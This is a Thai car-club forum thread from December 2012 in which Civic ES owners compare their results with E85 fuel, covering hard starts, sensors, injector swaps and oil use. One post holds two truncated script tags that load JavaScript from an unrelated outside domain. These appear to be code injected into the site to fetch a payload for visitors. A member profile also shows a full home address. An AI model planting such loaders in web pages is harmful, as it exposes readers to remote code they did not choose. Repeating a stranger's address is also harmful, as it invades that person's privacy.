ตอบ
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 15 ธันวา 2012 01:38 - ผมเติม E85 เพียวๆเลยครับ
AofStaR พิมพ์ว่า:

pop2pop พิมพ์ว่า:
พักหลังๆ ไฟเอ็นจิ้นเริ่มโชว์บ่อยขึ้น ล่าสุดขับรถเพื่อจะไปเติมน้ำมันฝนตกหนัก หลังจากออกจากปั้ม ขึ้นสะพานต่างระดับ พยายามขับแซงคันหน้าโดยออกขวา พอเปลี่ยนเลนเท่านั้นแหละ ไฟขึ้น เหยียบไม่ไป เลยต้องกลับเลนเดิม ตีไฟฉุกเฉินบนสะพาน ค่อยๆชะลอจนลงมาเชิงสะพานดับเครื่องแล้วก็สตาร์ทใหม่ก็เป็นปรกติ

ผมว่าอากาศเย็น ห้องเครื่องเย็นหรือโดนน้ำ น่าจะมีผล

วันนี้ไปเปลี่ยนหัวเทียน น้ำมันเครื่อง กรองน้ำมันเครื่อง น้ำมันเกียร์ กรองเบนซิน แล้วจะลองไปเจอฝนซักทีดูว่าจะเหมือนเดิมไม๊....

แต่จะหาฝนมาลองได้หรือเปล่ายังไม่รู้


พี่รุจครับ ของผมอาการนี้เลย ผมเอาไปให้0เช็คช่างบอกว่าเซ็นเซอร์ออกซิเจนตัวที่1เสื่อมครับ(ตัวที่อยู่ตรงเฮดเดอร์)เบิก0 ราคา7พันกว่าบาท ผมเลยไปเบิกเชียงกงครับ 500 หายเลยครับ

เคสนี้เป็นประโยชน์มากครับสำหรับท่านที่ไฟโชว์..เพราะเท่าที่สังเกตูไม่เคยมีใครเช็ค0-2..เซนเซอร์กันเท่าไหร
ได้รับคำขอบคุณจาก: pop2pop 
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 16 ธันวา 2012 03:34 - ผมเติม E85 เพียวๆเลยครับ
pop2pop พิมพ์ว่า:
จากกระทู้นี้..

http://www.civicesgroup.com/forum/topic48975

เดี๋ยวคงมีคนหันมากิน E85 อีกหลายคัน

เพิ่มเติม:

พอดีได้ไปเจอบทความใน Pantip มา พอได้อ่านแล้วก็นึกปลื้มใจเล็กๆ เมื่อได้อ่านความเห็นที่ 16

http://topicstock.pantip.com/ratchada/topicstock/2009/12/V8611281/V8611281.html

เผื่อหลายๆท่านที่ยังลังเล ก็เก็บไว้เป็นข้อมูลในการตัดสินใจลองใช้กันดู...


ขออนุญาตินำกลับมาโพสใหม่ให้คนที่พลาดเพื่อความมั่นใจกันนะครับ....ขอบคูณคุณ pop2pop..ด้วยครับ...
civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 16 ธันวา 2012 08:08 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:

basic00 พิมพ์ว่า:
หนาวนี้ขอตัวไปเล่น E20 แทนก่อนดีกว่า
E85 โดนอากาศเย็นๆติดยาก
อุณหภูมิเป็นสาเหตุที่ทำให้ E85 ติดยาก



อากาศเย็นคือการที่มี O2 หนาแน่นครับ ทำให้ท่านที่ใช้ E85 ที่เดิมๆก็ส่วนผสมบางอยู่แล้วยิ่งบางเพิ่มเข้าไปอีก ทำให้ start ติดยากครับ
อุณหภูมิไม่ใช่สาเหตุครับ สาเหตุที่แท้จริงคืออัตราส่วนผสมที่ไม่เหมาะสมครับ


ส่วนเรื่องหัวเทียน ถ้ามันไม่บอดยังไงก็ start ติดครับ แต่ที่มัน start ไม่ติดก็เพราะอัตราส่วนผสมอากาศต่อน้ำมันไม่เหมาะสมครับจึงจุดไม่ติด
ต่อให้เปลี่ยนหัวเทียนใหม่ก็เป็นเหมือนเดิมครับ

หลักๆคือต้องหาทางเพิ่มน้ำมันเข้าไปอีกครับ แต่ก็อย่างว่า ใครอยากจะเสียตังค์เพิ่ม ในเมื่อของเดิมๆก็ยังพอใช้ได้


หน้าจะใช้ของผมใช้ได้ดี เพราะได้เปลี่ยนเป็นหัวฉีด เป็น 9 รู ของเดิมมีแค่ 4 รู และหัวเทียน NGK IRIDIUM IX เบอร์7 และก็ปั๊มติ๊ก 1j เห็นผลว่ารถแรงขึ้นนิดนึง    
ได้รับคำขอบคุณจาก: yo555  yoosabai 
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 16 ธันวา 2012 20:17 - ผมเติม E85 เพียวๆเลยครับ
civic3025 พิมพ์ว่า:

artoasis พิมพ์ว่า:

basic00 พิมพ์ว่า:
หนาวนี้ขอตัวไปเล่น E20 แทนก่อนดีกว่า
E85 โดนอากาศเย็นๆติดยาก
อุณหภูมิเป็นสาเหตุที่ทำให้ E85 ติดยาก



อากาศเย็นคือการที่มี O2 หนาแน่นครับ ทำให้ท่านที่ใช้ E85 ที่เดิมๆก็ส่วนผสมบางอยู่แล้วยิ่งบางเพิ่มเข้าไปอีก ทำให้ start ติดยากครับ
อุณหภูมิไม่ใช่สาเหตุครับ สาเหตุที่แท้จริงคืออัตราส่วนผสมที่ไม่เหมาะสมครับ


ส่วนเรื่องหัวเทียน ถ้ามันไม่บอดยังไงก็ start ติดครับ แต่ที่มัน start ไม่ติดก็เพราะอัตราส่วนผสมอากาศต่อน้ำมันไม่เหมาะสมครับจึงจุดไม่ติด
ต่อให้เปลี่ยนหัวเทียนใหม่ก็เป็นเหมือนเดิมครับ

หลักๆคือต้องหาทางเพิ่มน้ำมันเข้าไปอีกครับ แต่ก็อย่างว่า ใครอยากจะเสียตังค์เพิ่ม ในเมื่อของเดิมๆก็ยังพอใช้ได้


หน้าจะใช้ของผมใช้ได้ดี เพราะได้เปลี่ยนเป็นหัวฉีด เป็น 9 รู ของเดิมมีแค่ 4 รู และหัวเทียน NGK IRIDIUM IX เบอร์7 และก็ปั๊มติ๊ก 1j เห็นผลว่ารถแรงขึ้นนิดนึง    

ไม่นิดแล้วม้างงคับพี่เบิร์ด555...จับกล่องซิ่งยัดไปอีกใบนะครบเสต็ปซิ่งเลย
civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 16 ธันวา 2012 20:36 - ผมเติม E85 เพียวๆเลยครับ
yo555 พิมพ์ว่า:

civic3025 พิมพ์ว่า:

artoasis พิมพ์ว่า:

basic00 พิมพ์ว่า:
หนาวนี้ขอตัวไปเล่น E20 แทนก่อนดีกว่า
E85 โดนอากาศเย็นๆติดยาก
อุณหภูมิเป็นสาเหตุที่ทำให้ E85 ติดยาก



อากาศเย็นคือการที่มี O2 หนาแน่นครับ ทำให้ท่านที่ใช้ E85 ที่เดิมๆก็ส่วนผสมบางอยู่แล้วยิ่งบางเพิ่มเข้าไปอีก ทำให้ start ติดยากครับ
อุณหภูมิไม่ใช่สาเหตุครับ สาเหตุที่แท้จริงคืออัตราส่วนผสมที่ไม่เหมาะสมครับ


ส่วนเรื่องหัวเทียน ถ้ามันไม่บอดยังไงก็ start ติดครับ แต่ที่มัน start ไม่ติดก็เพราะอัตราส่วนผสมอากาศต่อน้ำมันไม่เหมาะสมครับจึงจุดไม่ติด
ต่อให้เปลี่ยนหัวเทียนใหม่ก็เป็นเหมือนเดิมครับ

หลักๆคือต้องหาทางเพิ่มน้ำมันเข้าไปอีกครับ แต่ก็อย่างว่า ใครอยากจะเสียตังค์เพิ่ม ในเมื่อของเดิมๆก็ยังพอใช้ได้


หน้าจะใช้ของผมใช้ได้ดี เพราะได้เปลี่ยนเป็นหัวฉีด เป็น 9 รู ของเดิมมีแค่ 4 รู และหัวเทียน NGK IRIDIUM IX เบอร์7 และก็ปั๊มติ๊ก 1j เห็นผลว่ารถแรงขึ้นนิดนึง    

ไม่นิดแล้วม้างงคับพี่เบิร์ด555...จับกล่องซิ่งยัดไปอีกใบนะครบเสต็ปซิ่งเลย

อยากอยู่แต่ไม่ตัง <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 17 ธันวา 2012 10:03 - ผมเติม E85 เพียวๆเลยครับ
เปลี่ยนหัวฉีดดีแล้ว จะทำให้ส่วนผสมหนาขึ้น
pay_ES


เข้าร่วม: 17 มีนา 2009
ตอบ: 133

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 73
ให้คำขอบคุณ: 182

ที่อยู่: Chiang Mai
จันทร์, 17 ธันวา 2012 11:44 - ผมเติม E85 เพียวๆเลยครับ
EXI 1700 ปี 01 หลังจากเติม E85 เพียวๆ บอกเลยว่ามีปัญหาสตาร์ทตอนเช้าไฟ Engine ชอบโชว์ ต้องดับเครื่องแล้วสตาร์ทใหม่ 2 - 3 รอบ
และมีปัญหาตอนจอดติดไฟแดง...วันนั้น อยู๋ดีๆ เครื่องดับไปเลย   ไฟหน้าปัดโชว์ทุกอย่าง ต้องปิดสวิตช์แล้วสตาร์ทใหม่

วิธีแก้ไขผมคือเติม อัตราส่วนการเติมแบบ 30:20 ... เช่นจะเติม 500 ผมเติม E85 300/ Gas 91  200 ....
หลังจากนั้นผมพบว่าแทบจะไม่มีปัญหาให้เห็นอีกเลย...

...เรามาถูกทางแล้วครับพี่น้อง
ได้รับคำขอบคุณจาก: honeybeex7 
nongnb


ชื่อเล่น: น้อง

เข้าร่วม: 04 ตุลา 2012
ตอบ: 356

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 347
ให้คำขอบคุณ: 75

ที่อยู่: เชียงราย
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 18 ธันวา 2012 11:10 - ผมเติม E85 เพียวๆเลยครับ
ES01 พิมพ์ว่า:
สำหรับเพื่อนๆที่ใช้ แผนที่ garmin ผมทำ POI E85 ให้แล้วลองเอาไปใช้ดูครับ

อัพเดทข้อมูลล่าสุด จากลิงค์คุณ Noumy
กทม. 35
ตจว. 29

POI_E85new1.1.rar
http://www.2shared.com/file/iq94u2RK/POI_E85new11.html
http://www.upload-thai.com/download.php?id=3d86b7c1f64ffbdc7c49a1c89860c328

ขอบคุณคาบ
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 20 ธันวา 2012 03:57 - ผมเติม E85 เพียวๆเลยครับ
หลังปีใหม่คงเติมE85สนุกแน่....แต่กลัวจะขึ้นราคาเนี่ยจิ
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 20 ธันวา 2012 10:19 - ผมเติม E85 เพียวๆเลยครับ
ถังที่ 2 มาแว้วววว

ผมเติม E85 เพียวๆเลยครับ ปั๊มเดิม เจ้าเก่า


ผมเติม E85 เพียวๆเลยครับ จ่ายน้อยกว่าถังแรก 10 บาท


หลังจากเติมถังที่ 2 รถมีอาการสตาร์ทติดยากกว่าปกติอย่างเห็นได้ชัด แต่ก็กดครั้งเดียวติด ไม่ทราบว่า พอมีวิธีแก้ไขอะไรได้บ้าง 
(อาการคือ ถ้าเติมน้ำมันปกติบิดกุญแจสตาร์ทประมาณ 0.5 วินาที แต่ E85 ประมาณ 1 วินาที)

คิดว่าจะลองขับไป คอยสังเกตอาการไป ถ้าไม่พอใจ จะ Reset ECU อีกสักรอบ เพราะถังแรกยังเป็นน้ำมันผสมอยู่ ถัง 2 เป็นต้นไป E85 เพียวๆ

ปล.ขอให้ Civic ES E85 Style โชคดีปีใหม่ มีความสุขทุกท่านครับ
rakyat


ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

ที่อยู่: จ.สุราษฎร์ธานี
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 20 ธันวา 2012 10:53 - ผมเติม E85 เพียวๆเลยครับ
wow wow wow ขอขอบคุณสำหรับข้อมูลดีๆ สำหรับทุกท่านด้วยนะครับ
WarHighways


ชื่อเล่น: วาร์

เข้าร่วม: 04 มิถุนา 2012
ตอบ: 1283

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1312
ให้คำขอบคุณ: 1463

ที่อยู่: บางกะปิ กรุงเทพ.
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 20 ธันวา 2012 11:19 - ผมเติม E85 เพียวๆเลยครับ
ใช้ E85 รบกวน เพื่อนๆ พี่ๆ น้องๆ เช็ค น้ำมันเครื่องด้วยนะครับ  เท่าที่เจอมา พบว่า มันกินน้ำมันเครื่องครับผม
     ผม ได้เช็กแล้ว ว่าไม่มีการรั่ววึมจากจุดใดๆ ครับ  
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 20 ธันวา 2012 13:46 - ผมเติม E85 เพียวๆเลยครับ
WarHighways พิมพ์ว่า:
ใช้ E85 รบกวน เพื่อนๆ พี่ๆ น้องๆ เช็ค น้ำมันเครื่องด้วยนะครับ  เท่าที่เจอมา พบว่า มันกินน้ำมันเครื่องครับผม
     ผม ได้เช็กแล้ว ว่าไม่มีการรั่ววึมจากจุดใดๆ ครับ  


ทำไมถึงกินน้ำมันเครื่องครับ เป็นข้อเท็จจริงหรือเปล่า?

ถ้าเป็นทุกคัน ต้องมีสาเหตุน่ะครับ (ว่าแต่ ผมก็ยังไม่ได้เช็คเลย..อิอิ)
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 20 ธันวา 2012 15:54 - ผมเติม E85 เพียวๆเลยครับ
หลังปีใหม่อย่าขึ้นราคาเลยนะจ๊ะ e85
ปล.ถอด lpg ออกแล้วมาทำ e85 เต็มระบบแล้วด้วย เช่น ปรับกำลังอัด ปรับแต่งฝาสูบแคม เปลี่ยนหัวฉีด+กล่องซิ่ง
sunnytomei


เข้าร่วม: 25 กันยา 2011
ตอบ: 298

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 436

ที่อยู่: หินกอง,สระบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 20 ธันวา 2012 16:02 - ผมเติม E85 เพียวๆเลยครับ
lkki5 พิมพ์ว่า:
หลังปีใหม่อย่าขึ้นราคาเลยนะจ๊ะ e85
ปล.ถอด lpg ออกแล้วมาทำ e85 เต็มระบบแล้วด้วย เช่น ปรับกำลังอัด ปรับแต่งฝาสูบแคม เปลี่ยนหัวฉีด+กล่องซิ่ง


ไม่ทราบว่าพอมีรูปe85 เต็มระบบแล้วด้วย เช่น  เปลี่ยนหัวฉีด+กล่องซิ่ง พอดีหาข้อมูลอยู่เหมือนกันคับ(จะให้ดีผมขอตัวเลขแบบประมาณด้วยก็ดีคับ)
civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 20 ธันวา 2012 16:31 - ผมเติม E85 เพียวๆเลยครับ
lkki5 พิมพ์ว่า:
หลังปีใหม่อย่าขึ้นราคาเลยนะจ๊ะ e85
ปล.ถอด lpg ออกแล้วมาทำ e85 เต็มระบบแล้วด้วย เช่น ปรับกำลังอัด ปรับแต่งฝาสูบแคม เปลี่ยนหัวฉีด+กล่องซิ่ง


สาธุๆ ถอดแก๊สแล้วเหมือนกันครับ
ได้รับคำขอบคุณจาก: yo555 
wit2524


ชื่อเล่น: วิทย์

เข้าร่วม: 14 กรกฎา 2012
ตอบ: 105

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 71
ให้คำขอบคุณ: 361

ที่อยู่: ชลบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 20 ธันวา 2012 22:44 - ผมเติม E85 เพียวๆเลยครับ
WarHighways พิมพ์ว่า:
ใช้ E85 รบกวน เพื่อนๆ พี่ๆ น้องๆ เช็ค น้ำมันเครื่องด้วยนะครับ  เท่าที่เจอมา พบว่า มันกินน้ำมันเครื่องครับผม
     ผม ได้เช็กแล้ว ว่าไม่มีการรั่ววึมจากจุดใดๆ ครับ  


ใช้น้ำมันเครื่องเบอร์อะไรครับ...
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 21 ธันวา 2012 08:14 - ผมเติม E85 เพียวๆเลยครับ
sunnytomei พิมพ์ว่า:
lkki5 พิมพ์ว่า:
หลังปีใหม่อย่าขึ้นราคาเลยนะจ๊ะ e85
ปล.ถอด lpg ออกแล้วมาทำ e85 เต็มระบบแล้วด้วย เช่น ปรับกำลังอัด ปรับแต่งฝาสูบแคม เปลี่ยนหัวฉีด+กล่องซิ่ง


ไม่ทราบว่าพอมีรูปe85 เต็มระบบแล้วด้วย เช่น  เปลี่ยนหัวฉีด+กล่องซิ่ง พอดีหาข้อมูลอยู่เหมือนกันคับ(จะให้ดีผมขอตัวเลขแบบประมาณด้วยก็ดีคับ)




ตอบ รวมกล่องด้วยน่าจะมีสี่กลางๆครับ
sunnytomei


เข้าร่วม: 25 กันยา 2011
ตอบ: 298

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 436

ที่อยู่: หินกอง,สระบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 21 ธันวา 2012 08:26 - ผมเติม E85 เพียวๆเลยครับ
lkki5 พิมพ์ว่า:
sunnytomei พิมพ์ว่า:
lkki5 พิมพ์ว่า:
หลังปีใหม่อย่าขึ้นราคาเลยนะจ๊ะ e85
ปล.ถอด lpg ออกแล้วมาทำ e85 เต็มระบบแล้วด้วย เช่น ปรับกำลังอัด ปรับแต่งฝาสูบแคม เปลี่ยนหัวฉีด+กล่องซิ่ง


ไม่ทราบว่าพอมีรูปe85 เต็มระบบแล้วด้วย เช่น  เปลี่ยนหัวฉีด+กล่องซิ่ง พอดีหาข้อมูลอยู่เหมือนกันคับ(จะให้ดีผมขอตัวเลขแบบประมาณด้วยก็ดีคับ)




ตอบ รวมกล่องด้วยน่าจะมีสี่กลางๆครับ



ขอบคุณคับ
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 21 ธันวา 2012 11:59 - ผมเติม E85 เพียวๆเลยครับ
WarHighways พิมพ์ว่า:
ใช้ E85 รบกวน เพื่อนๆ พี่ๆ น้องๆ เช็ค น้ำมันเครื่องด้วยนะครับ  เท่าที่เจอมา พบว่า มันกินน้ำมันเครื่องครับผม
     ผม ได้เช็กแล้ว ว่าไม่มีการรั่ววึมจากจุดใดๆ ครับ  



ผมเพิ่งเช็คน้ำมันเครื่อง น้ำมันเกียร์ AT เมื่อคืน ปกติทุกอย่างครับ

28 นี้ มีทริปทางไกล ภูเก็ต-น่าน แล้วจะมารายงานสถานการณ์น่ะครับ E85 โลดๆ
nekimaja


ชื่อเล่น: เอ็ม

เข้าร่วม: 21 ธันวา 2012
ตอบ: 72

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 25
ให้คำขอบคุณ: 6

ที่อยู่: สมุทรปราการ
เสาร์, 22 ธันวา 2012 00:17 - ผมเติม E85 เพียวๆเลยครับ
สวัสดีคับ พอดีที่บ้านมีรถตู้โตโยต้าอยู่คันนึง เครื่อง 3S-FE อยากเติม E85 ก็เลยลองหาความรู้จากกระทู้ต่างๆ เพิ่งเข้ามาเจออ่านไปได้เกือบ 20 หน้าก็ท้อซะแล้ว ก็เลยลองเติม E85 ไปถังนึง อาการตอนออกตัว/เร่งแซงอืดมากแทบไม่ไปเลย แต่พอช่วง 60 ไปแล้วก็เร่งดี แต่มาช้าหน่อย ไหลได้เรื่อยๆ นอกจากติดกล่องอยากรู้ว่าต้องทำอย่างไรบ้าง อาการถึงหาย ใครเก่งหรือมีเพื่อนที่เซียนๆเครื่องตัวนี้รบกวนทีนะคับ ปล.ถึงไม่ได้ขับฮอนด้าแต่ใจผมรักซีวิคตัวไดเมนชั่นนะคับ^^
pop2pop


เข้าร่วม: 09 มกรา 2011
ตอบ: 334

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 169

ที่อยู่: สุขุมวิท 101/1
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 22 ธันวา 2012 00:52 - ผมเติม E85 เพียวๆเลยครับ
nekimaja พิมพ์ว่า:
สวัสดีคับ พอดีที่บ้านมีรถตู้โตโยต้าอยู่คันนึง เครื่อง 3S-FE อยากเติม E85 ก็เลยลองหาความรู้จากกระทู้ต่างๆ เพิ่งเข้ามาเจออ่านไปได้เกือบ 20 หน้าก็ท้อซะแล้ว ก็เลยลองเติม E85 ไปถังนึง อาการตอนออกตัว/เร่งแซงอืดมากแทบไม่ไปเลย แต่พอช่วง 60 ไปแล้วก็เร่งดี แต่มาช้าหน่อย ไหลได้เรื่อยๆ นอกจากติดกล่องอยากรู้ว่าต้องทำอย่างไรบ้าง อาการถึงหาย ใครเก่งหรือมีเพื่อนที่เซียนๆเครื่องตัวนี้รบกวนทีนะคับ ปล.ถึงไม่ได้ขับฮอนด้าแต่ใจผมรักซีวิคตัวไดเมนชั่นนะคับ^^

ก็ไม่ใช่เซียนอะไรนะครับ แต่เท่าที่อ่านๆมา หัวใจคือ E85 จะใช้อัตราส่วนน้ำมันที่เยอะกว่าน้ำมันชนิดอื่นๆในการเผาไหม้ ฉะนั้นถ้าต้องการให้ปริมาณน้ำมันเยอะขึ้น ถ้าจูนECUไม่ได้ ก็คงต้องเปลี่ยนหัวฉีดที่สามารถฉีดปริมาณได้มากขึ้นกว่าเดิม ( ECUมันจะสั่งฉีดปริมาณเท่าเดิมหรือเปล่า อันนี้ไม่แน่ใจ แต่เท่าที่อ่านจากกระทู้แล้วก็เห็นผลนะ ) ส่วน regulator จะมีผลมากน้อย ส่วนตัวคิดว่าถ้าหัวฉีดเดิมก็อาจจะไม่ได้ผลอะไรมากมายเพราะรูหัวฉีดเท่าเดิม น่าจะต้องเปลี่ยนหัวฉีดใหม่ถึงจะเห็นผลมากขึ้น

ก็อาจจะค่อยๆทำไปทีละขั้นผลเป็นอย่างไรจะได้รู้ว่าเปลี่ยนอะไรผลดีขนาดไหนครับ

***ในรถรุ่นเก่า สิ่งควรพึงระวังคือพวกท่อน้ำมัน ถังน้ำมันและลูกลอย นอกจะไม่รองรับ e85 แล้ว ความเสื่อมสภาพที่ไม่อาจมองเห็นที่ภายนอก อาจทำให้เกิดความเสียหายได้ เพราะจาก http://topicstock.pantip.com/ratchada/topicstock/2009/12/V8611281/V8611281.html ความเห็นที่ 18
รถที่ใช้ทดลอง civic dimension เป็นรุ่นนึงที่ใช้เป็นรถทดสอบ ผมจึงมั่นใจในระดับหนึ่งว่าอุปกรณ์น่าจะปลอดภัย

แต่ในรถรุ่นอื่นๆก็ไม่สามารถสรุปได้ในแบบเดียวกันครับ ไว้เป็นข้อมูลในการตัดสินใจดู
ได้รับคำขอบคุณจาก: honeybeex7 
nekimaja


ชื่อเล่น: เอ็ม

เข้าร่วม: 21 ธันวา 2012
ตอบ: 72

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 25
ให้คำขอบคุณ: 6

ที่อยู่: สมุทรปราการ
เสาร์, 22 ธันวา 2012 09:30 - ผมเติม E85 เพียวๆเลยครับ
pop2pop พิมพ์ว่า:
nekimaja พิมพ์ว่า:
สวัสดีคับ พอดีที่บ้านมีรถตู้โตโยต้าอยู่คันนึง เครื่อง 3S-FE อยากเติม E85 ก็เลยลองหาความรู้จากกระทู้ต่างๆ เพิ่งเข้ามาเจออ่านไปได้เกือบ 20 หน้าก็ท้อซะแล้ว ก็เลยลองเติม E85 ไปถังนึง อาการตอนออกตัว/เร่งแซงอืดมากแทบไม่ไปเลย แต่พอช่วง 60 ไปแล้วก็เร่งดี แต่มาช้าหน่อย ไหลได้เรื่อยๆ นอกจากติดกล่องอยากรู้ว่าต้องทำอย่างไรบ้าง อาการถึงหาย ใครเก่งหรือมีเพื่อนที่เซียนๆเครื่องตัวนี้รบกวนทีนะคับ ปล.ถึงไม่ได้ขับฮอนด้าแต่ใจผมรักซีวิคตัวไดเมนชั่นนะคับ^^

ก็ไม่ใช่เซียนอะไรนะครับ แต่เท่าที่อ่านๆมา หัวใจคือ E85 จะใช้อัตราส่วนน้ำมันที่เยอะกว่าน้ำมันชนิดอื่นๆในการเผาไหม้ ฉะนั้นถ้าต้องการให้ปริมาณน้ำมันเยอะขึ้น ถ้าจูนECUไม่ได้ ก็คงต้องเปลี่ยนหัวฉีดที่สามารถฉีดปริมาณได้มากขึ้นกว่าเดิม ( ECUมันจะสั่งฉีดปริมาณเท่าเดิมหรือเปล่า อันนี้ไม่แน่ใจ แต่เท่าที่อ่านจากกระทู้แล้วก็เห็นผลนะ ) ส่วน regulator จะมีผลมากน้อย ส่วนตัวคิดว่าถ้าหัวฉีดเดิมก็อาจจะไม่ได้ผลอะไรมากมายเพราะรูหัวฉีดเท่าเดิม น่าจะต้องเปลี่ยนหัวฉีดใหม่ถึงจะเห็นผลมากขึ้น

ก็อาจจะค่อยๆทำไปทีละขั้นผลเป็นอย่างไรจะได้รู้ว่าเปลี่ยนอะไรผลดีขนาดไหนครับ

***ในรถรุ่นเก่า สิ่งควรพึงระวังคือพวกท่อน้ำมัน ถังน้ำมันและลูกลอย นอกจะไม่รองรับ e85 แล้ว ความเสื่อมสภาพที่ไม่อาจมองเห็นที่ภายนอก อาจทำให้เกิดความเสียหายได้ เพราะจาก http://topicstock.pantip.com/ratchada/topicstock/2009/12/V8611281/V8611281.html ความเห็นที่ 18
